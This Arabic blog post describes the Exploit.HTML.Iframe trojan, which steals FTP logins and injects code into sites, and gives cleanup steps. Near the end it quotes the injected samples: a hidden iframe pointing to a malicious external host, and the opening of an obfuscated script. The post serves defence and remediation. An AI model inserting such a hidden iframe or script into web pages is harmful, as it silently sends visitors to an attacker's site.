حل مشكلة التروجان HTML.Iframe


حل مشكلة التروجان Exploit.HTML.Iframe

ظهرت منذ فترة برنامج ضار ” تروجان ” يقوم بزرع بعض الاكواد في صفحات المواقع في هذا الموضوع سوف نقوم بايجاد حل بسيط للتغلب على هذه المشكلة باذن الله تعالى مع العلم ان المشكة عالمية ولا يوجد لها حل جذري الى الان.

المشكة :
تكمن مشكلة هذا التروجان في انه يقوم بالحصول على معلومات ال FTP الخاصة بموقعكم ويقوم بالدخول الى ملفات الموقع وزرع كود بها . وبالتالي تقوم محركات البخث مثل جوجل بحظر الدخول الى موقعكم وتصنيفه على انه من الموقع الضارة وهي مشكلة كبيرة .

هدف من هذا التروجان :
هو استخدام موقعكم لجلب زوار الى موقع المخترق عن طريق استخدام كود Iframe بحيث اي زائر يقوم بزيارة موقعكم يقوم ايضا ” ولكن بطريقة مخفية بزيارة موقع المخترق ” وبالتالي يحصل على زوار ويرتفع الرابنك الخاص بموقعه .

الحل :

الحل بسبط جدا وفعال باذن الله تعالى.

1- قم بعمل تفحص للفيروسات على جهازك للتأكد من خلوه من اي ملفات ضارة . ويفضل ان يتم تنصيب نسخة جديدة كليا من نظام التشغيل مع عمل فورمات قبل ذلك.

2- قم بالدخول الى لوح التحكم cPanel وقم بعمل تفحص لموقعك ضد الفيروسات وذلك عن طريق ” ماسح الفيروسات ”

3- بعد الانتهاء من تفحص ملفات الموقع قم بالدخول الى ملفات موقعك المصابة وقم بازالة جميع الاكواد التي اضافها المخترق.

4- قم بتغير جميع كلمات المرور الخاصة بلوحة التحكم او ال FTP.

5- استخدام sftp مميز هالنظام لانه يستخدم تشفير بيانات الموقع اسم المستخدم والباسوورد استخدمه حاليا ومرتاح معه الى ابعد الحدود.

6- استخدام تصريح 111 فتره قصيره لانه استخدامه على سكربت يعني عدم اخذ نسخه احتياطيه له يوم يومين حتى تقضي على الفايروس وبعدها ترجع التصاريح مثل ما كانت .


وبهذا باذن الله تكون قد تغلبت على هذا التروجان واوقفت انتشاره

ملاحظة : في حالة الاصابة بهذا التروجان و في حالة ان جوجل صنفت الموقع على انه من المواقع الضارة . فقط اتبع الخطوات السابقة ومن ثم قم بالدخول الى Google Webmaster Central والطلب منهم اعادة النظر في موقعك.

بالنسبة للفايروس اللي كان بموقعي بهذا الشكل

كود PHP:
<iframe src="http://xb4.ru:8080/index.php" width=147 height=177 style="visibility: hidden"></iframe
وكمان نوع اخر مشفر

كود PHP:
<script>function v4a911875ebcf1(v4a911875ec0d9){  return(parseInt(v4a911875ec0d9,16));}function v4a911875ecc8e(v4a911875ed075
بس الحمد لله انحذف ..

مشكلته كبيرة يدخل لكل ملفات index.php او index.html يعني لو عندك بالموقع 100 ملف من هذا النوع كم تقعد تبحث وتحذف ..

اتمنى الفائدة للجميع ..
 
 
 
 

twitter شارك هذه الصفحة :

شارك الصفحة في الفيس بوك
شارك الصفحة في صدي قوقل
شارك الصفحة في تويتر Twitter
تابعنا عبر خدمة الخلاصات RSS
تابع تعليقات المدونة عبر الـRSS

أضف بريدك للاشتراك بالقائمة البريدية

Delivered by FeedBurner

0 التعليقات:

إرسال تعليق